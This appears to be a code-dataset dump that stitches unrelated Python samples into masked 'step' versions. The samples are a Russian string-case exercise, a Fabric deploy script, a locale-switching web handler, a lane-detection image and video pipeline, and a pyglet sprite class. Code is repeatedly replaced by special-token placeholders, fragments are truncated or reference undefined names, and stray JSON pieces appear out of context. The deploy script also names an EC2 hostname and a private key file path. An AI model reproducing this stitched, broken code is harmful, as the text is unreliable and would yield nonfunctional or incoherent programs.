"step-4": "\"\"\"\n 1. Если в строке больше символов в нижнем регистре - вывести все в нижнем,\n если больше в верхнем - вывести все в верхнем,\n если поровну - вывести в противоположных регистрах.\n 2. Если в строке каждое слово начинается с заглавной буквы, тогда\n добавить в начало строки 'done. '.\n Иначе заменить первые 5 элементов строки на 'draft: '.\n (можно использовать метод replace и/или конкатенацию строк + срезы)\n 3. Если длина строки больше 20, то обрезать лишние символы до 20.\n Иначе дополнить строку символами '@' до длины 20.\n (можно использовать метод ljust либо конкатенацию и дублирование (+ и *))\n После выполнения кажого пункта выводить результат типа:\n 1. Исходная строка: \"some string\".\n Результат: \"some edited string\".\n (Использовать форматирование строк f либо метод format)\n\"\"\"\n\nstring = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'\n\nupp_regist = low_regist = title_regist = 0\n\nfor char in string:\n if char.isupper():\n upp_regist += 1\n elif char.islower():\n low_regist += 1\n\nprint('Some string:', string)\nif upp_regist > low_regist:\n print('Some edited string:', string.upper())\nelif low_regist > upp_regist:\n print('Some edited string:', string.lower())\nelse:\n print('Some edited string:', string.swapcase())\n\nprint('Some string:', string)\nif string.istitle():\n print('Some edited string: done. ' + string)\nelse:\n print('Some edited string:', string.replace('Lorem', 'draft: '))\n\nprint('Some string:', string)\nif len(string) > 20:\n string = string[:20]\n print('Some edited string:', string)\nelse:\n print('Some edited string:', string.ljust(20, '@'))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pack():
local('git checkout')
local('git commit -a -s -m "Fabric Pack Commit"')
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
AWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'
PROJECT_DIR = '/var/www/kamper'
APP_DIR = '%s/app' % PROJECT_DIR
<|reserved_special_token_0|>
env.user = 'kamper'
env.hosts = [AWS_EC2_01]
env.key_filename = (
'/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'
)
def pack():
local('git checkout')
local('git commit -a -s -m "Fabric Pack Commit"')
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
from fabric.api import *
AWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'
PROJECT_DIR = '/var/www/kamper'
APP_DIR = '%s/app' % PROJECT_DIR
<|reserved_special_token_0|>
env.user = 'kamper'
env.hosts = [AWS_EC2_01]
env.key_filename = (
'/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'
)
def pack():
local('git checkout')
local('git commit -a -s -m "Fabric Pack Commit"')
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
# Controls the targets that Fabric runs commands against.
from fabric.api import *

# Public DNS name of the production EC2 instance (currently running).
AWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com' # Running

# Project layout on the remote host.
PROJECT_DIR = '/var/www/kamper'
APP_DIR = '%s/app' % PROJECT_DIR

"""
# the user to use for the remote commands
env.user = 'appuser'
# the servers where the commands are executed
env.hosts = ['server1.example.com', 'server2.example.com']
"""

# Remote SSH user, target hosts, and local private key for authentication.
# NOTE(review): the key path is machine-specific — consider an env variable.
env.user = 'kamper'
env.hosts = [AWS_EC2_01]
env.key_filename = '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'
def pack():
    """
    Prepare the local repository for deployment.

    Checks out the working tree and commits all tracked changes in a
    signed-off commit. Runs on the local machine via Fabric's local().
    """
    local('git checkout')
    # local('git add *')
    local('git commit -a -s -m "Fabric Pack Commit"')
    # local('git push origin master', capture=False)
def deploy():
    """
    Deploy the application to the configured hosts.

    Currently a stub that only logs the action; the real remote steps
    (running deploy.sh inside APP_DIR over SSH) are intentionally disabled.
    """
    print('deploying')
|
flexible
|
{
"blob_id": "98db990f406cc6815480cca33011c8b0b2ad67c7",
"index": 2343,
"step-1": "<mask token>\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-2": "<mask token>\n\n\ndef pack():\n local('git checkout')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-3": "<mask token>\nAWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'\nPROJECT_DIR = '/var/www/kamper'\nAPP_DIR = '%s/app' % PROJECT_DIR\n<mask token>\nenv.user = 'kamper'\nenv.hosts = [AWS_EC2_01]\nenv.key_filename = (\n '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'\n )\n\n\ndef pack():\n local('git checkout')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-4": "from fabric.api import *\nAWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'\nPROJECT_DIR = '/var/www/kamper'\nAPP_DIR = '%s/app' % PROJECT_DIR\n<mask token>\nenv.user = 'kamper'\nenv.hosts = [AWS_EC2_01]\nenv.key_filename = (\n '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'\n )\n\n\ndef pack():\n local('git checkout')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-5": "# fabric이 실행할 대상을 제어.\n\nfrom fabric.api import *\n\nAWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com' # Running\n\n\nPROJECT_DIR = '/var/www/kamper'\n\nAPP_DIR = '%s/app' % PROJECT_DIR\n\n\"\"\"\n\n# the user to use for the remote commands\nenv.user = 'appuser'\n\n# the servers where the commands are executed\nenv.hosts = ['server1.example.com', 'server2.example.com']\n\n\"\"\"\n\n\nenv.user = 'kamper'\nenv.hosts = [AWS_EC2_01]\nenv.key_filename = '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'\n\n\ndef pack():\n # create a new source distribution as tarball\n local('git checkout')\n # local('git add *')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\n # local('git push origin master', capture=False)\n\n\ndef deploy():\n print('deploying')\n pass\n\n # with settings(warn_only=True):\n # with cd(APP_DIR):\n # run('sudo ./deploy.sh')\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from mx.handlers import MainHandler
# handler for changing app language
class Locale(MainHandler):
    """
    handles requests to change LOCALE or language for internationalization.
    """
    def get(self):
        # Requested locale code from the query string, e.g. "en-US".
        locale = self.request.get('locale')
        if not locale :
            # NOTE(review): LOCALE is not defined in this module — presumably
            # a module-level default imported elsewhere; confirm it's in scope.
            locale = LOCALE
        # Normalise to the "xx_YY" form: first two chars lowercased as the
        # language, last two uppercased as the region.
        locale = locale[:2].lower()+'_'+locale[-2:].upper()
        if self.switch_locale(locale):
            # Persist the preference on the logged-in user if it changed.
            if self.local_user and self.local_user.locale != locale:
                u = LocalUser.by_id(self.local_user.key.id())
                u.locale = locale
                u.put()
            self.write_json({'done':True})
        else:
            self.write_json({'done':False})
# home page handler
class MainPage(MainHandler):
    def get(self):
        # Render the landing page template.
        self.render('home.html')
    def post(self):
        # Password from the submitted form.
        # NOTE(review): the value is read but never used here — the method
        # appears truncated or unfinished; confirm the intended behavior.
        pw = self.request.get('pw')
|
normal
|
{
"blob_id": "bdcbb946dadf168149342c651ad03eaf4b748401",
"index": 6803,
"step-1": "<mask token>\n\n\nclass Locale(MainHandler):\n <mask token>\n <mask token>\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-2": "<mask token>\n\n\nclass Locale(MainHandler):\n <mask token>\n\n def get(self):\n locale = self.request.get('locale')\n if not locale:\n locale = LOCALE\n locale = locale[:2].lower() + '_' + locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done': True})\n else:\n self.write_json({'done': False})\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-3": "<mask token>\n\n\nclass Locale(MainHandler):\n \"\"\"\n handles requests to change LOCALE or language for internationalization.\n \"\"\"\n\n def get(self):\n locale = self.request.get('locale')\n if not locale:\n locale = LOCALE\n locale = locale[:2].lower() + '_' + locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done': True})\n else:\n self.write_json({'done': False})\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-4": "from mx.handlers import MainHandler\n\n\nclass Locale(MainHandler):\n \"\"\"\n handles requests to change LOCALE or language for internationalization.\n \"\"\"\n\n def get(self):\n locale = self.request.get('locale')\n if not locale:\n locale = LOCALE\n locale = locale[:2].lower() + '_' + locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done': True})\n else:\n self.write_json({'done': False})\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-5": "\nfrom mx.handlers import MainHandler\n\n# handler for changing app language\nclass Locale(MainHandler):\n \"\"\"\n handles requests to change LOCALE or language for internationalization.\n \"\"\"\n def get(self):\n locale = self.request.get('locale')\n if not locale :\n locale = LOCALE\n locale = locale[:2].lower()+'_'+locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done':True})\n else:\n self.write_json({'done':False})\n\n\n# home page handler\nclass MainPage(MainHandler):\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n \n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
<|reserved_special_token_0|>
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
if __name__ == '__main__':
""" INITIALIZATION """
im_dir_src = 'test_images'
im_dir_dst = 'test_images_output'
create_dir(im_dir_dst)
im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))
im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))
video_dir_src = 'test_videos'
video_dir_dst = 'test_videos_output'
create_dir(video_dir_dst)
video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'
video_files_src = get_full_paths_to_files(video_dir_src, video_files)
video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)
params_1 = DEFAULT_PARAMS.copy()
params_1['canny_lo'] = 50
params_1['canny_hi'] = 150
""" MEDIA GENERATION """
visualize_pipeline('pipeline.png')
images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)
save_images(images_dst, im_files_dst)
process_and_save_video(video_files_src[0], video_files_dst[0],
COMP_GRAPH, DEFAULT_PARAMS)
process_and_save_video(video_files_src[1], video_files_dst[1],
COMP_GRAPH, params_1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
COMP_GRAPH = lanespipeline.computational_graph
DEFAULT_PARAMS = lanespipeline.parameters
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
if __name__ == '__main__':
""" INITIALIZATION """
im_dir_src = 'test_images'
im_dir_dst = 'test_images_output'
create_dir(im_dir_dst)
im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))
im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))
video_dir_src = 'test_videos'
video_dir_dst = 'test_videos_output'
create_dir(video_dir_dst)
video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'
video_files_src = get_full_paths_to_files(video_dir_src, video_files)
video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)
params_1 = DEFAULT_PARAMS.copy()
params_1['canny_lo'] = 50
params_1['canny_hi'] = 150
""" MEDIA GENERATION """
visualize_pipeline('pipeline.png')
images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)
save_images(images_dst, im_files_dst)
process_and_save_video(video_files_src[0], video_files_dst[0],
COMP_GRAPH, DEFAULT_PARAMS)
process_and_save_video(video_files_src[1], video_files_dst[1],
COMP_GRAPH, params_1)
<|reserved_special_token_1|>
'''
Generate the output images and videos, including rendering of the pipeline
'''
import os
import matplotlib.image as mpimg
import cv2
from moviepy.editor import VideoFileClip
from networkx.drawing.nx_agraph import to_agraph
import lanespipeline
import lanefinder
from compgraph import CompGraph, CompGraphRunner
# Pipeline definition and its default parameter set, as declared by the
# lanespipeline module; used as defaults throughout this script.
COMP_GRAPH = lanespipeline.computational_graph
DEFAULT_PARAMS = lanespipeline.parameters
def create_dir(directory):
    """Create *directory* (including parents) if it does not already exist.

    Uses ``exist_ok=True`` so the call is idempotent and race-free: another
    process creating the directory between a check and the ``makedirs`` call
    can no longer cause a ``FileExistsError``.
    """
    os.makedirs(directory, exist_ok=True)
def get_full_paths_to_files(files_dir, filenames):
    """Join *files_dir* onto every name in *filenames* and return the list."""
    return [os.path.join(files_dir, name) for name in filenames]
def process_images(im_filenames, cg, params):
    """Lazily run the lane-finding pipeline over a list of image files.

    The pipeline objects are built eagerly, but the files are only read and
    processed as the returned iterator is consumed.
    """
    _, find_and_draw_lanes = lanefinder.create_objects(cg, params)
    loaded = map(mpimg.imread, im_filenames)
    return map(find_and_draw_lanes, loaded)
def save_images(images, destination_filenames):
    """Write each image to its corresponding destination path (pairwise)."""
    for destination, image in zip(destination_filenames, images):
        mpimg.imsave(destination, image)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
    """Annotate every frame of a video with detected lanes and save it.

    The output clip is written without an audio track.
    """
    _, find_and_draw_lanes = lanefinder.create_objects(cg, params)
    annotated = VideoFileClip(video_fname_src).fl_image(find_and_draw_lanes)
    annotated.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
    """Render the pipeline's computational graph to an image at *fname_dst*."""
    runner = CompGraphRunner(cg, frozen_tokens=params)
    graph = to_agraph(runner.token_manager.to_networkx())
    # Graphviz 'dot' layout gives a top-down layered rendering of the DAG.
    graph.layout('dot')
    graph.draw(fname_dst)
if __name__ == '__main__':
    ''' INITIALIZATION '''
    # Still-image test set: read from im_dir_src, write annotated copies
    # to im_dir_dst (created if missing).
    im_dir_src = 'test_images'
    im_dir_dst = 'test_images_output'
    create_dir(im_dir_dst)
    # Both path lists come from two separate os.listdir(im_dir_src) calls;
    # assumes the directory contents do not change between them, so the
    # source and destination lists stay index-aligned.
    im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))
    im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))
    # Video test set uses an explicit, fixed file list.
    video_dir_src = 'test_videos'
    video_dir_dst = 'test_videos_output'
    create_dir(video_dir_dst)
    video_files = ('solidWhiteRight.mp4', 'solidYellowLeft.mp4')
    video_files_src = get_full_paths_to_files(video_dir_src, video_files)
    video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)
    # Second parameter set overrides the Canny thresholds for the second clip.
    params_1 = DEFAULT_PARAMS.copy()
    params_1['canny_lo'] = 50
    params_1['canny_hi'] = 150
    ''' MEDIA GENERATION '''
    # Render the pipeline graph, then process the images and both videos.
    visualize_pipeline('pipeline.png')
    images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)
    save_images(images_dst, im_files_dst)
    process_and_save_video(video_files_src[0], video_files_dst[0], COMP_GRAPH, DEFAULT_PARAMS)
    process_and_save_video(video_files_src[1], video_files_dst[1], COMP_GRAPH, params_1)
|
flexible
|
{
"blob_id": "456d79a69c170a59af742648f16e0171cd5a2412",
"index": 1412,
"step-1": "<mask token>\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\n<mask token>\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n video_src = VideoFileClip(video_fname_src)\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n video_src = VideoFileClip(video_fname_src)\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\nif __name__ == '__main__':\n \"\"\" INITIALIZATION \"\"\"\n im_dir_src = 'test_images'\n im_dir_dst = 'test_images_output'\n create_dir(im_dir_dst)\n im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))\n im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))\n video_dir_src = 'test_videos'\n video_dir_dst = 'test_videos_output'\n create_dir(video_dir_dst)\n video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'\n video_files_src = get_full_paths_to_files(video_dir_src, video_files)\n video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)\n params_1 = DEFAULT_PARAMS.copy()\n params_1['canny_lo'] = 50\n params_1['canny_hi'] = 150\n \"\"\" MEDIA GENERATION \"\"\"\n visualize_pipeline('pipeline.png')\n images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)\n save_images(images_dst, 
im_files_dst)\n process_and_save_video(video_files_src[0], video_files_dst[0],\n COMP_GRAPH, DEFAULT_PARAMS)\n process_and_save_video(video_files_src[1], video_files_dst[1],\n COMP_GRAPH, params_1)\n",
"step-4": "<mask token>\nCOMP_GRAPH = lanespipeline.computational_graph\nDEFAULT_PARAMS = lanespipeline.parameters\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n video_src = VideoFileClip(video_fname_src)\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\nif __name__ == '__main__':\n \"\"\" INITIALIZATION \"\"\"\n im_dir_src = 'test_images'\n im_dir_dst = 'test_images_output'\n create_dir(im_dir_dst)\n im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))\n im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))\n video_dir_src = 'test_videos'\n video_dir_dst = 'test_videos_output'\n create_dir(video_dir_dst)\n video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'\n video_files_src = get_full_paths_to_files(video_dir_src, video_files)\n video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)\n params_1 = DEFAULT_PARAMS.copy()\n params_1['canny_lo'] = 50\n params_1['canny_hi'] = 150\n \"\"\" MEDIA GENERATION \"\"\"\n visualize_pipeline('pipeline.png')\n 
images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)\n save_images(images_dst, im_files_dst)\n process_and_save_video(video_files_src[0], video_files_dst[0],\n COMP_GRAPH, DEFAULT_PARAMS)\n process_and_save_video(video_files_src[1], video_files_dst[1],\n COMP_GRAPH, params_1)\n",
"step-5": "'''\nGenerate the output images and videos, including rendering of the pipeline\n'''\n\nimport os\nimport matplotlib.image as mpimg\nimport cv2\nfrom moviepy.editor import VideoFileClip\nfrom networkx.drawing.nx_agraph import to_agraph\n\nimport lanespipeline\nimport lanefinder\nfrom compgraph import CompGraph, CompGraphRunner\n\n\nCOMP_GRAPH = lanespipeline.computational_graph\nDEFAULT_PARAMS = lanespipeline.parameters\n\n\ndef create_dir(directory):\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef get_full_paths_to_files(files_dir, filenames):\n\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n\n images = (mpimg.imread(fname) for fname in im_filenames)\n\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n\n video_src = VideoFileClip(video_fname_src)\n\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n\n runner = CompGraphRunner(cg, frozen_tokens=params)\n\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\nif __name__ == '__main__':\n\n ''' INITIALIZATION '''\n\n im_dir_src = 'test_images'\n im_dir_dst = 'test_images_output'\n create_dir(im_dir_dst)\n\n im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))\n im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))\n\n video_dir_src = 'test_videos'\n video_dir_dst = 'test_videos_output'\n create_dir(video_dir_dst)\n\n video_files = 
('solidWhiteRight.mp4', 'solidYellowLeft.mp4')\n video_files_src = get_full_paths_to_files(video_dir_src, video_files)\n video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)\n\n params_1 = DEFAULT_PARAMS.copy()\n params_1['canny_lo'] = 50\n params_1['canny_hi'] = 150\n\n ''' MEDIA GENERATION '''\n\n visualize_pipeline('pipeline.png')\n\n images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)\n save_images(images_dst, im_files_dst)\n\n process_and_save_video(video_files_src[0], video_files_dst[0], COMP_GRAPH, DEFAULT_PARAMS)\n process_and_save_video(video_files_src[1], video_files_dst[1], COMP_GRAPH, params_1)\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
class Fire(pyglet.sprite.Sprite):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
